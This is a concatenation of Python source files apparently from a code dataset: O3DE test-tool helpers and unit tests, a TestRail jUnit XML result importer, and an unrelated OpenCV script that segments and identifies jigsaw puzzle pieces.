Ignores a path if it contains any string in the [ignore_list]. """ if ignore_list is None: ignore_list = [] all_files = [] for root, _, files in os.walk(start_dir): for file_name in files: full_path = os.path.join(root, file_name) if all([False for word in ignore_list if word in full_path]): all_files.append(os.path.relpath(full_path, start_dir)) return all_files def compare_lists(actual: List[str], expected: List[str]) -> bool: """Compares the two lists of strings. Returns false and prints any discrepancies if present.""" # Find difference between expected and actual diff = {"actual": [], "expected": []} for asset in actual: if asset not in expected: diff["actual"].append(asset) for asset in expected: if asset not in actual: diff["expected"].append(asset) # Log difference between actual and expected (if any). Easier for troubleshooting if diff["actual"]: logger.info("The following assets were actually found but not expected:") for asset in diff["actual"]: logger.info(" " + asset) if diff["expected"]: logger.info("The following assets were expected to be found but were actually not:") for asset in diff["expected"]: logger.info(" " + asset) # True ONLY IF both diffs are empty return not diff["actual"] and not diff["expected"] def delete_MoveOutput_folders(search_path: List[str] or str) -> None: """ Deletes any directories that start with 'MoveOutput' in specified search location :param search_path: either a single path or a list of paths to search inside for MoveOutput folders :return: None """ delete_list = [] def search_one_path(search_location): nonlocal delete_list for file_or_folder in os.listdir(search_location): file_or_folder_path = os.path.join(search_location, file_or_folder) if os.path.isdir(file_or_folder_path) and file_or_folder.startswith("MoveOutput"): delete_list.append(file_or_folder_path) if isinstance(search_path, List): for single_path in search_path: search_one_path(single_path) else: search_one_path(search_path) fs.delete(delete_list, False, True) def find_queries(line: str, queries_to_find: List[str or List[str]]) -> List[str or List[str]]: """ Searches for strings and/or combinations of strings within a line :param line: Line to search :param queries_to_find: List containing strings and/or lists of strings to find :return: List of strings and/or lists of strings found within the line """ queries_found = [] for query in queries_to_find: # If query is a list then find each list item as a substring within the line if isinstance(query, list): subqueries_to_find = query[:] while subqueries_to_find and subqueries_to_find[0] in line: subqueries_to_find.pop(0) if subqueries_to_find == []: queries_found.append(query) # Otherwise find query as a substring within the line elif query in line: queries_found.append(query) return queries_found def validate_log_output( log_output: List[str or List[str]], expected_queries: List[str or List[str]] = [], unexpected_queries: List[str or List[str]] = [], failure_cb: Callable = None ) -> None: """ Asserts that the log output contains all expected queries and no unexpected queries. :param log_output: log output of the application :param expected_queries: String or list containing strings and/or lists of strings to be found :param unexpected_queries: String or list containing strings and/or lists of strings not to be found :param failure_cb: Optional callback when log output isn't expected, useful for printing debug info :return: None """ expected_queries = [expected_queries] if isinstance(expected_queries, str) else expected_queries unexpected_queries = [unexpected_queries] if isinstance(unexpected_queries, str) else unexpected_queries unexpectedly_found = [] for line in log_output: # Remove queries expectedly found in the log from queries to expect for found_query in find_queries(line, expected_queries): expected_queries.remove(found_query) # Save unexpectedly found lines if find_queries(line, unexpected_queries): unexpectedly_found.append(line) if failure_cb and (len(unexpected_queries) > 0 or len(expected_queries) > 0): failure_cb() # Assert no unexpected lines found and all expected queries found assert unexpectedly_found == [], f"Unexpected line(s) were found in the log run: {unexpectedly_found}" assert expected_queries == [], f"Expected query(s) were not found in the log run: {expected_queries}" def validate_log_messages( log_file: str, expected_queries: str or List[str or List[str]] = [], unexpected_queries: str or List[str or List[str]] = [], ) -> None: """ Asserts that the most recent log run contains all expected queries and no unexpected queries. Queries can be strings and/or combinations of strings [[using nested lists]]. :param log_file: Path to the log file being used :param expected_queries: String or list containing strings and/or lists of strings to be found :param unexpected_queries: String or list containing strings and/or lists of strings not to be found :return: None """ # Search the log lines in the latest log run validate_log_output(APLogParser(log_file).runs[-1]["Lines"], expected_queries, unexpected_queries) def validate_relocation_report( log_file: str, expected_queries: str or List[str or List[str]] = [], unexpected_queries: str or List[str or List[str]] = [], ) -> None: """ Asserts that the relocation report section of the most recent log run contains all expected queries and no unexpected queries. Queries can be strings and/or combinations of strings [[using nested lists]]. :param log_file: Path to the log file being used :param expected_queries: String or list containing strings and/or lists of strings to be found :param unexpected_queries: String or list containing strings and/or lists of strings not to be found :return: None """ expected_queries = [expected_queries] if isinstance(expected_queries, str) else expected_queries unexpected_queries = [unexpected_queries] if isinstance(unexpected_queries, str) else unexpected_queries unexpectedly_found = [] in_relocation_report = False # Search the log lines which appear between opening and closing RELOCATION REPORT lines in the latest log run for line in APLogParser(log_file).runs[-1]["Lines"]: if "RELOCATION REPORT" in line: in_relocation_report = not in_relocation_report continue # Go to next log line if in_relocation_report: # Remove queries expectedly found in the relocation report from queries to expect for found_query in find_queries(line, expected_queries): expected_queries.remove(found_query) # Save unexpectedly found lines if find_queries(line, unexpected_queries): unexpectedly_found.append(line) # Assert no unexpected lines found and all expected queries found assert unexpectedly_found == [], f"Unexpected line(s) were found in the relocation report: {unexpectedly_found}" assert expected_queries == [], f"Expected query(s) were not found in the relocation report: {expected_queries}" def get_paths_from_wildcard(root_path: str, wildcard_str: str) -> List[str]: """ Convert a wildcard path into a list of existing full paths. :param root_path: Full path in which to search for matches for the wildcard string :param wildcard_str: Must contain exactly one "*", at the beginning or end, or be simply "*" :return: List of all full paths which satisfy the wildcard criteria """ rel_path_list = get_relative_file_paths(root_path) if not wildcard_str == "*": if wildcard_str.startswith("*"): rel_path_list = [item for item in rel_path_list if item.endswith(wildcard_str[1:])] elif wildcard_str.endswith("*"): rel_path_list = [item for item in rel_path_list if item.startswith(wildcard_str[0:-1])] return [os.path.join(root_path, item) for item in rel_path_list] def check_for_perforce(): command_list = ['p4', 'info'] try: p4_output = subprocess.check_output(command_list).decode('utf-8') except subprocess.CalledProcessError as e: logger.error(f"Failed to call {command_list} with error {e}") return False if not p4_output.startswith("User name:"): logger.warning(f"Perforce not found, output was {p4_output}") return False client_root_match = re.search(r"Client root: (.*)\r", p4_output) if client_root_match is None: logger.warning(f"Could not determine client root for p4 workspace. Perforce output was {p4_output}") return False else: # This requires the tests to be in the Perforce path that the tests run against. working_path = os.path.realpath(__file__).replace("\\", "/").lower() client_root = client_root_match.group(1).replace("\\", "/").lower() if not working_path.startswith(client_root): logger.error(f"""Perforce client root '{client_root}' does not contain current test directory '{working_path}'. Please run this test with a Perforce workspace that contains the test asset directory path.""") return False logger.info(f"Perforce found, output was {p4_output}") return True def get_file_hash(filePath, hashBufferSize = 65536): assert os.path.exists(filePath), f"Cannot get file hash, file at path '{filePath}' does not exist." sha1 = hashlib.sha1() with open(filePath, 'rb') as cacheFile: while True: data = cacheFile.read(hashBufferSize) if not data: break sha1.update(data) return sha1.hexdigest() ``` #### File: tests/unit/test_ly_process_killer.py ```python import unittest.mock as mock import pytest import ly_test_tools._internal.managers.ly_process_killer pytestmark = pytest.mark.SUITE_smoke class TestProcessKiller(object): @mock.patch('ly_test_tools.environment.process_utils.process_exists') def test_DetectLumberyardProcesses_ValidProcessesList_ReturnsDetectedProcessesList(self, mock_process_exists): mock_process_exists.side_effect = [True, False] mock_process_list = ['foo', 'bar'] under_test = ly_test_tools._internal.managers.ly_process_killer.detect_lumberyard_processes( processes_list=mock_process_list) assert under_test == ['foo'] def test_KillProcesses_ProcessesListIsNotList_RaisesLyProcessKillerException(self): with pytest.raises(ly_test_tools._internal.managers.ly_process_killer.LyProcessKillerException): ly_test_tools._internal.managers.ly_process_killer.kill_processes(processes_list={}) ``` #### File: tests/unit/test_screenshot_compare_qssim.py ```python import unittest.mock as mock import numpy as np import pytest import ly_test_tools.image.screenshot_compare_qssim as screenshot_compare pytestmark = pytest.mark.SUITE_smoke class TestScreenshotCompare(object): def test_QuaternionMatrixConj_4x3Matrix_ValidConjugate(self): given_matrix = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10 , 11, 12]]]) expected_conjugateMatrix = np.array([[[1, -2, -3, -4], [5, -6, -7, -8], [9, -10, -11, -12]]]) result_conjugateMatrix = screenshot_compare._quaternion_matrix_conj(given_matrix) assert np.array_equal(result_conjugateMatrix,expected_conjugateMatrix) def test_QuaternionMatrixDot_4x3matrix_ValidDotProduct(self): given_matrix = np.array([[[0, 0, 0, 2], [0, 0, 4, 0], [0, 0, 8, 0]]]) expected_answer = np.array([[2, 4, 8]]) result_matrix = screenshot_compare._quaternion_matrix_dot(given_matrix, given_matrix) assert np.array_equal(expected_answer,result_matrix) @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_dot') def test_QuaternionMatrixNorm_DotProductUsed_AssertDotProductCalled(self, mock_matrixDotProduct): given_matrix = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) screenshot_compare._quaternion_matrix_norm(given_matrix) mock_matrixDotProduct.assert_called_once() mock_matrixDotProduct.assert_called_with(given_matrix,given_matrix) @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_norm') def test_QuaternionMatrixDivide_NormCalledForSecondMatrix_AssertNormCalled(self, mock_matrixNorm): matrix_a = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) matrix_b = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) mock_matrixNorm.return_value = np.array([[1,2,3]]) screenshot_compare._quaternion_matrix_div(matrix_a, matrix_b) mock_matrixNorm.assert_called_with(matrix_b) @mock.patch('numpy.divide',mock.MagicMock()) @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_mult',mock.MagicMock()) @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_conj') def test_QuaternionMatrixDivide_ConjugateCalledForSecondMatrix_AssertConjugateCalled(self, mock_matrixConjugate): matrix_a = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) matrix_b = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) screenshot_compare._quaternion_matrix_div(matrix_a, matrix_b) mock_matrixConjugate.assert_called_with(matrix_b) @mock.patch('numpy.divide',mock.MagicMock()) @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_conj') @mock.patch('ly_test_tools.image.screenshot_compare_qssim._quaternion_matrix_mult') def test_QuaternionMatrixDivide_MultiplyCalledForMatAConjB_AssertMultiplyCalled(self, mock_matrixMultiply,mock_matrixConjugate): matrix_a = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) matrix_b = np.array([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]]) mock_conjugate_return = np.array([[[1, -2, -3, -4], [5, -6, -7, -8], [9, -10, -11, -12]]]) mock_matrixConjugate.return_value = mock_conjugate_return screenshot_compare._quaternion_matrix_div(matrix_a, matrix_b) mock_matrixMultiply.assert_called_with(matrix_a,mock_conjugate_return) @mock.patch('imageio.imread') @mock.patch('imageio.imwrite',mock.MagicMock()) def test_qssim_CheckSameImage_ShouldReturnOne(self, mock_imageRead): matrix_a = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) matrix_b = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) mock_imageRead.side_effect = [matrix_a,matrix_b] assert screenshot_compare.qssim('test1.jpg', 'test2.jpg') == 1 @mock.patch('imageio.imread') @mock.patch('imageio.imwrite',mock.MagicMock()) def test_qssim_CheckAlmostSameImage_GreaterThanHalf(self, mock_imageRead): matrix_a = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) matrix_b = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 19]]]) mock_imageRead.side_effect = [matrix_a,matrix_b] assert screenshot_compare.qssim('test1.jpg', 'test2.jpg') > 0.5 @mock.patch('imageio.imread') @mock.patch('imageio.imwrite',mock.MagicMock()) def test_qssim_CheckDifferentImage_ShouldNotReturnOne(self, mock_imageRead): matrix_a = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) matrix_b = np.array([[[11, 12, 13], [14, 15, 16], [17, 18, 19]]]) mock_imageRead.side_effect = [matrix_a,matrix_b] assert screenshot_compare.qssim('test1.jpg', 'test2.jpg') != 1 @mock.patch('imageio.imread') @mock.patch('imageio.imwrite') def test_qssim_CheckDiffImageSaved_AssertImSave(self, mock_imageSave, mock_imageRead): matrix_a = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) matrix_b = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9]]]) mock_imageRead.side_effect = [matrix_a,matrix_b] screenshot_compare.qssim('test1.jpg', 'test2.jpg') mock_imageSave.assert_called() ``` #### File: tests/unit/test_shader_compiler.py ```python import unittest.mock as mock import pytest import ly_test_tools._internal.managers.workspace import ly_test_tools._internal.managers.abstract_resource_locator import ly_test_tools.o3de.shader_compiler pytestmark = pytest.mark.SUITE_smoke mock_initial_path = "mock_initial_path" mock_engine_root = "mock_engine_root" mock_dev_path = "mock_dev_path" mock_build_directory = 'mock_build_directory' mock_project = 'mock_project' @mock.patch('ly_test_tools._internal.managers.abstract_resource_locator.os.path.abspath', mock.MagicMock(return_value=mock_initial_path)) @mock.patch('ly_test_tools._internal.managers.abstract_resource_locator._find_engine_root', mock.MagicMock(return_value=(mock_engine_root, mock_dev_path))) @mock.patch('ly_test_tools.o3de.asset_processor.logger.warning', mock.MagicMock()) class TestShaderCompiler(object): @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') def test_Init_MockWorkspace_MembersSetCorrectly(self, mock_workspace): under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) assert under_test._workspace == mock_workspace assert under_test._sc_proc is None @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') @mock.patch('subprocess.Popen') @mock.patch('ly_test_tools.WINDOWS', True) def test_Start_NoneRunning_ProcessStarted(self, mock_popen, mock_workspace): mock_shader_compiler_path = 'mock_shader_compiler_path' mock_workspace.paths.get_shader_compiler_path.return_value = mock_shader_compiler_path mock_popen.return_value = mock.MagicMock() under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) assert under_test._sc_proc is None under_test.start() assert under_test._sc_proc is not None mock_popen.assert_called_once_with(['RunAs', '/trustlevel:0x20000', mock_shader_compiler_path]) @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') @mock.patch('subprocess.Popen') @mock.patch('ly_test_tools.o3de.shader_compiler.MAC', True) def test_Start_NotImplemented_ErrorRaised(self, mock_popen, mock_workspace): under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) assert under_test._sc_proc is None with pytest.raises(NotImplementedError): under_test.start() assert under_test._sc_proc is None mock_popen.assert_not_called() @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') @mock.patch('subprocess.Popen') @mock.patch('ly_test_tools.o3de.shader_compiler.logger.info') @mock.patch('ly_test_tools.o3de.shader_compiler.MAC', True) def test_Start_AlreadyRunning_ProcessNotChanged(self, mock_logger, mock_popen, mock_workspace): mock_shader_compiler_path = 'mock_shader_compiler_path' mock_workspace.paths.get_shader_compiler_path.return_value = mock_shader_compiler_path mock_popen.return_value = mock.MagicMock() under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) under_test._sc_proc = 'foo' under_test.start() assert under_test._sc_proc is not None mock_popen.assert_not_called() mock_logger.assert_called_once_with( 'Attempted to start shader compiler at the path: {0}, ' 'but we already have one open!'.format(mock_shader_compiler_path)) @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') @mock.patch('ly_test_tools.o3de.shader_compiler.process_utils.kill_processes_started_from') @mock.patch('ly_test_tools.o3de.shader_compiler.waiter.wait_for') def test_Stop_AlreadyRunning_ProcessStopped(self, mock_wait, mock_kill, mock_workspace): mock_shader_compiler_path = 'mock_shader_compiler_path' mock_workspace.paths.get_shader_compiler_path.return_value = mock_shader_compiler_path under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) under_test._sc_proc = 'foo' under_test.stop() assert under_test._sc_proc is None mock_kill.assert_called_once_with(mock_shader_compiler_path) mock_wait.assert_called_once() @mock.patch('ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager') @mock.patch('ly_test_tools.o3de.shader_compiler.process_utils.kill_processes_started_from') @mock.patch('ly_test_tools.o3de.shader_compiler.waiter.wait_for') @mock.patch('ly_test_tools.o3de.shader_compiler.logger.info') def test_Stop_NoneRunning_MessageLogged(self, mock_logger, mock_wait, mock_kill, mock_workspace): mock_shader_compiler_path = 'mock_shader_compiler_path' mock_workspace.paths.get_shader_compiler_path.return_value = mock_shader_compiler_path under_test = ly_test_tools.o3de.shader_compiler.ShaderCompiler(mock_workspace) under_test._sc_proc = None under_test.stop() assert under_test._sc_proc is None mock_kill.assert_not_called() mock_wait.assert_not_called() mock_logger.assert_called_once_with( 'Attempted to stop shader compiler at the path: {0}, ' 'but we do not have any open!'.format(mock_shader_compiler_path)) ``` #### File: lib/testrail_importer/testrail_importer.py ```python import argparse import datetime import logging import os import getpass import sys try: # py2 import testrail_tools.testrail_connection as testrail_connection import testrail_tools.testrail_report_converter as testrail_report_converter import testrail_tools.testrail_api_connector as testrail_api_connector except ImportError: # py3 import lib.testrail_importer.testrail_tools.testrail_connection as testrail_connection import lib.testrail_importer.testrail_tools.testrail_report_converter as testrail_report_converter import lib.testrail_importer.testrail_tools.testrail_api_connector as testrail_api_connector log = logging.getLogger(__name__) class TestRailImporterError(Exception): """Raised when an expected error occurs for the TestRailImporter() class.""" pass class TestRailImporter(object): """ Parses a jUnitXML file and pushes the report results to TestRail. """ def __init__(self): self._cli_args = self.cli_args() def __filter_test_cases(self, testrun_results): """ Takes a list of pass/fail test results with multiple test case IDs and returns a list of pass/fail test results for each test case ID. :param testrun_results: list containing test run pass/fail results with test case IDs all grouped together :return: list containing a pass/fail result for each test case ID """ updated_test_results = [] for test_result in testrun_results: filtered_result = [] case_ids = test_result.get('case_ids') if case_ids: filtered_result = self.__filter_test_case_ids(test_result) updated_test_results.extend(filtered_result) test_result.pop('case_ids') log.info('TestRailImporter: Test Case ID filtering ' 'finished: {}'.format(updated_test_results)) return updated_test_results def __filter_test_case_ids(self, test_result): """ Takes a list of test case IDs and generates 1 test result per test case ID, appends it to a list, then returns the list. :param test_result: dict containing test result values :return: list of test result dicts, 1 test result dict per test case ID or None if no test case IDs found. """ result_for_each_id = [] case_ids = test_result.get('case_ids') if case_ids: for case_id in case_ids: new_result = test_result.copy() new_result['case_id'] = case_id result_for_each_id.append(new_result) return result_for_each_id def cli_args(self): """ Parse for CLI args to use with the TestRailImporter. :return: argparse.ArgumentParser containing all CLI args passed. """ parser = argparse.ArgumentParser(description="TestRail XML test result importer.") parser.add_argument("--testrail-xml", nargs='?', required=True, help="REQUIRED: Path to jUnitXML file.") parser.add_argument("--testrail-url", nargs='?', required=True, help="REQUIRED: URL of the TestRail site to use.") parser.add_argument("--testrail-user", nargs='?', required=True, help="REQUIRED: The user to log in as on TestRail for API calls.") parser.add_argument("--testrail-project-id", required=True, help="ID for the TestRail project") parser.add_argument("--testrail-password", help="TestRail password for the --testrail-user arg passed." "REQUIRED: If not manually executing the script (i.e. automation)." "NOTE: Be sure to use a secured method of passing this parameter if you use it.") parser.add_argument("--testrun-name", help="Name of the test run", default="Automated TestRail Report") parser.add_argument("--logs-folder", help="Sub-folder within ~/TestRailImporter/ to store .log " "files for python logging.", default='reports') parser.add_argument("--testrun-id", help="ID for the TestRail test run. " "This value takes priority over all other identifiers for a test run. " "If left blank, the TestRailImporter will create a new test run in the " "project ID specified (and suite ID if required).") parser.add_argument("--testrail-suite-id", help="Suite ID for the TestRail project: required if no '--testrun-id' CLI arg " "is passed and a project has suites. Not required if a project lacks suites.") args = parser.parse_args() return args def project_suite_check(self, client, project_id): """ Sends a request to the TestRail API to determine if a project has suites or not. Projects with suites need a suite ID specified in the request to add a new test run. :param client: TestRailConnection client object for communicating with the TestRail API. :param project_id: string representing the ID for a TestRail project to target for the suites check. :return: True if the project has suites and a '--testrail-suite-id' CLI arg value, otherwise raise a TestRailImporterError exception. """ has_multiple_suites = None project_suites = client.get_suites(project_id) if project_suites: has_multiple_suites = len(project_suites) > 1 if has_multiple_suites and not self._cli_args.testrail_suite_id: if self._cli_args.testrun_id: return True raise TestRailImporterError( "TestRailImporter requires the '--testrail-suite-id' CLI arg if the project has more than 1 suite and " "no '--testrun-id' CLI arg is passed.") return True def start_log(self, logs_folder): """ Configures the root Logger for all modules with log objects to inherit from. :param logs_folder: string representing the logs folder name, which is passed in by the "--logs-folder=" CLI arg and created inside of the ~/TestRailImporter/ directory. """ # Logging format variables. timestamp_format = '%Y-%m-%dT%H-%M-%S-%f' # ISO with colon and period replaced to dash log_format_string = '%(asctime)-15s %(message)s' now = datetime.datetime.now().strftime(timestamp_format) # Logging file & folder path variables. full_path = os.path.realpath(__file__) log_directory = os.path.join(os.path.dirname(full_path), '..', '..', logs_folder) log_filename = "testrail_importer_log_{}.log".format(now) if not os.path.isdir(log_directory): log.warn('TestRailImporter: Logging directory not created. ' 'Creating in: {}'.format(log_directory)) os.makedirs(log_directory) full_log_file_path = os.path.join(log_directory, log_filename) # Stream handler for console output. stream_handler = logging.StreamHandler() stream_handler.setFormatter(logging.Formatter(log_format_string)) stream_handler.setLevel(logging.INFO) # File handler for saving to a log file. file_handler = logging.FileHandler(full_log_file_path) file_handler.setFormatter(logging.Formatter(log_format_string)) file_handler.setLevel(logging.INFO) # Root logger other module-level loggers will inherit from. root_logger = logging.getLogger('') root_logger.setLevel(logging.INFO) root_logger.addHandler(stream_handler) root_logger.addHandler(file_handler) def testrail_client(self, url, user, password): """ TestRailConnection object for making API requests to the TestRail API. :param url: string representing the TestRail URL to target. i.e.: 'https://testrail.yourspecialurl.com/' :param user: string representing the TestRail user to access the API with. :param password: string representing the password to go with the TestRail user parameter. :return testrail_connection.TestRailConnection client. """ client = testrail_connection.TestRailConnection( url=url, user=user, password=password ) return client def testrail_converter(self): """ TestRailReporterConverter object for converting jUnitXML reports into a TestRail readable format for importing test results. :return: testrail_report_converter.TestRailReportConverter() """ return testrail_report_converter.TestRailReportConverter() def main(self): """ Main executor for converting and pushing .xml test results to TestRail using TestRailImporter. :return: None """ # Configure logging & start root logger. self.start_log(self._cli_args.logs_folder) # Sort out the TestRail account password first, for security reasons. password = self._cli_args.testrail_password if not password: if not sys.stdin.isatty(): raise TestRailImporterError( "No --testrail-password CLI arg passed and no TTY input detected. " "Please pass the required CLI arg or use a TTY console/terminal for manual input with " "@echo off enabled.") log.warn('--testrail-password CLI arg not passed, but TTY input detected.') password = getpass.getpass( "Enter the TestRail Password for TestRail account {}: ".format(self._cli_args.testrail_user)) # Connect the TestRailImporter to the TestRail API using TestRailConnection object. client = self.testrail_client(url=self._cli_args.testrail_url, user=self._cli_args.testrail_user, password=password) # Check if '--testrail-suite-id' is required. self.project_suite_check(client=client, project_id=self._cli_args.testrail_project_id) # Convert the jUnitXML report for TestRail converted_test_case_ids = [] testrun_results = dict() test_report_results = self.testrail_converter().xml_to_list_of_dicts( self._cli_args.testrail_xml) # Determine which XML test case IDs exist on the targeted TestRail project. for result in test_report_results: converted_test_case_ids.extend(result.get('case_ids')) test_case_ids = set(converted_test_case_ids) testrail_test_cases = client.get_valid_test_case_ids(test_case_ids) # Create the test run & add tests to the test run. if not self._cli_args.testrun_id: self._cli_args.testrun_id = client.create_run(project_id=self._cli_args.testrail_project_id, suite_id=self._cli_args.testrail_suite_id, testrun_name=self._cli_args.testrun_name, case_ids=testrail_test_cases) else: client.add_tests(testrun_id=self._cli_args.testrun_id, case_ids=testrail_test_cases) tests_added_to_run = client.get_tests(self._cli_args.testrun_id) testrun_results['results'] = self.__filter_test_cases(test_report_results) testrun_results['testrun_id'] = self._cli_args.testrun_id # Parse for TestRail test case IDs detected & XML test case IDs collected. testrail_case_ids_detected = [] xml_case_ids_collected = [] if tests_added_to_run: for test in tests_added_to_run: testrail_case_ids_detected.append(test['case_id']) for result in testrun_results['results']: xml_case_ids_collected.append(result['case_id']) # Post test results to the created test run. log.info('TestRailImporter: Posting results to TestRail: {}'.format(testrun_results)) try: client.post_test_results(testrun_results) except testrail_api_connector.TestRailAPIError: # Report on mismatched XML & TestRail IDs. log.warning( 'TestRailImporter: For test run ID "{}" - collected XML test case IDs: "{}" - ' '& detected TestRail test case IDs: "{}"\n' 'If you fail to see results on TestRail, is it probably due to these ID mismatches.'.format( self._cli_args.testrun_id, xml_case_ids_collected, testrail_case_ids_detected)) if __name__ == '__main__': TestRailImporter().main() ```
{ "source": "aaasenin/puzzles-segmentation", "score": 3 }
#### File: aaasenin/puzzles-segmentation/code.py ```python from skimage import io import numpy as np import matplotlib.pyplot as plt import cv2 # use old opencv, last version lacks SIFT, ex: pip install opencv-python==3.4.2.17 from PIL import Image, ImageEnhance image_dir = 'your image directory' train_image_dir = 'train image directory' def is_outlier(points, thresh=0.1): maximum = np.max(points) return points / maximum < thresh image = io.imread(image_dir) # image preprocessing for fore/backgroung building image = cv2.GaussianBlur(image, (351, 351), cv2.BORDER_DEFAULT) clahe = cv2.createCLAHE(clipLimit=1.5, tileGridSize=(2, 2)) lab = cv2.cvtColor(image, cv2.COLOR_BGR2LAB) l, a, b = cv2.split(lab) l2 = clahe.apply(l) # apply CLAHE to the L-channel lab = cv2.merge((l2, a, b)) image = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR) gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1] # building fore/backgroung markers dist = cv2.distanceTransform(thresh, cv2.DIST_L2, 3) cv2.normalize(dist, dist, 0, 1.0, cv2.NORM_MINMAX) _, dist = cv2.threshold(dist, 0.25, 1.0, cv2.THRESH_BINARY) dist = np.array(dist).astype(np.uint8) nlabels, labels, stats, centroids = cv2.connectedComponentsWithStats(dist, None, None, None, 8, cv2.CV_32S) areas = stats[1:, cv2.CC_STAT_AREA] result = np.zeros((labels.shape), np.uint8) for i in range(0, nlabels - 1): if areas[i] >= 1000: result[labels == i + 1] = 255 kernel = np.ones((20, 20),np.uint8) result = cv2.dilate(result, kernel, iterations = 3) kernel = np.ones((5, 5),np.uint8) result = cv2.erode(result, kernel, iterations = 15) kernel = np.ones((20, 20),np.uint8) background = cv2.dilate(result, kernel, iterations = 20) nlabels, labels, stats, centroids = cv2.connectedComponentsWithStats(result, None, None, None, 8, cv2.CV_32S) areas = stats[1:,cv2.CC_STAT_AREA] outliers_mask = is_outlier(areas, thresh=0.1) result = np.zeros((labels.shape), np.uint8) for i in range(0, nlabels - 1): if not outliers_mask[i]: result[labels == i + 1] = 255 unknown = cv2.subtract(background, result) ret, markers = cv2.connectedComponents(result) markers = markers + 1 markers[unknown == 255] = 0 # image preprocessing for watershed image = io.imread(image_dir) im = Image.fromarray(image) enhancer = ImageEnhance.Contrast(im) enhanced_im = enhancer.enhance(3.5) image = np.array(enhanced_im) image = cv2.medianBlur(image, 7) # watershed markers = cv2.watershed(image,markers) mask = (markers != 1).astype(np.uint8) def crop_image(img, mask=None): if mask is None: gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) mask = (gray_img != 0).astype(np.uint8) x, y, w, h = cv2.boundingRect(mask) return (img[y : y + h + 1, x : x + w + 1, :]).astype(np.uint8) train_image = io.imread(train_image_dir) # train_image preproc im = Image.fromarray(train_image) enhancer = ImageEnhance.Sharpness(im) enhanced_im = enhancer.enhance(5) train_image = np.array(enhanced_im) train_gray = cv2.cvtColor(train_image, cv2.COLOR_BGR2GRAY) train_gray = (train_gray != 0).astype(np.uint8) train_gray = cv2.medianBlur(train_gray, 5) kernel = np.ones((5,5),np.uint8) train_gray = cv2.dilate(train_gray, kernel, iterations = 1) # building train_markers and train_answers train_ret, train_markers = cv2.connectedComponents(train_gray) train_markers = train_markers + 1 train_idxes = [1, 2, 3, 4, 5, 7, 6, 9, 8, 10, 12, 13, 14, 15, 11, 16, 18, 20, 17, 19] train_masks = [] train_answers = ['P1B1', 'P2B2', 'P2B1', 'P1B2', 'P2B2', 'P1B2', 'P1B2', 'P0B2', 'P2B1', 'P1B2', 'P1B1', 'P3B0', 'P1B3', 'P3B1', 'P2B1', 'P1B3', 'P1B1', 'P2B2', 'P2B1', 'P2B1'] for comp_idx in np.unique(train_markers): if comp_idx != 1: mask = (train_markers == comp_idx).astype(np.uint8) bin_mask = (mask != 0).astype(np.uint8) train_masks.append(bin_mask) def compare_images(idxed_image, train_image, ratio_thresh): # comparing images based on number of matched sift key points # both idxed and train images should be cropped and masked sift = cv2.xfeatures2d.SIFT_create(nfeatures=100000) kp_1, desc_1 = sift.detectAndCompute(idxed_image, None) kp_2, desc_2 = sift.detectAndCompute(train_image, None) matcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_FLANNBASED) knn_matches = matcher.knnMatch(desc_1, desc_2, 2) good_matches = [] for m, n in knn_matches: if m.distance < ratio_thresh * n.distance: good_matches.append(m) decision_array = np.zeros(len(train_masks)) for match in good_matches: x, y = kp_2[match.trainIdx].pt for bin_mask_idx in range(len(train_masks)): x_m, y_m, w_m, h_m = cv2.boundingRect(train_masks[bin_mask_idx]) if x >= x_m and x <= x_m + w_m and y >= y_m and y <= y_m + h_m: decision_array[train_idxes[bin_mask_idx] - 1] += 1 break sorted_decision_array = sorted(decision_array) if sorted_decision_array[-1] != sorted_decision_array[-2]: return np.argmax(decision_array) + 1 else: # ambiguous answer, try one more time recursively return compare_images(idxed_image, train_image, ratio_thresh) image = io.imread(image_dir) # image preproc im = Image.fromarray(image) enhancer = ImageEnhance.Sharpness(im) enhanced_im = enhancer.enhance(5) image = np.array(enhanced_im) image = np.ascontiguousarray(image, dtype=np.uint8) # several iterations to make algorithm answers more robust num_iter = 1 for comp_idx in np.unique(markers): if comp_idx != -1 and comp_idx != 1: mask = (markers == comp_idx).astype(np.uint8) bin_mask = (mask != 0).astype(np.uint8) idxed_image = cv2.bitwise_and(image,image,mask=mask) 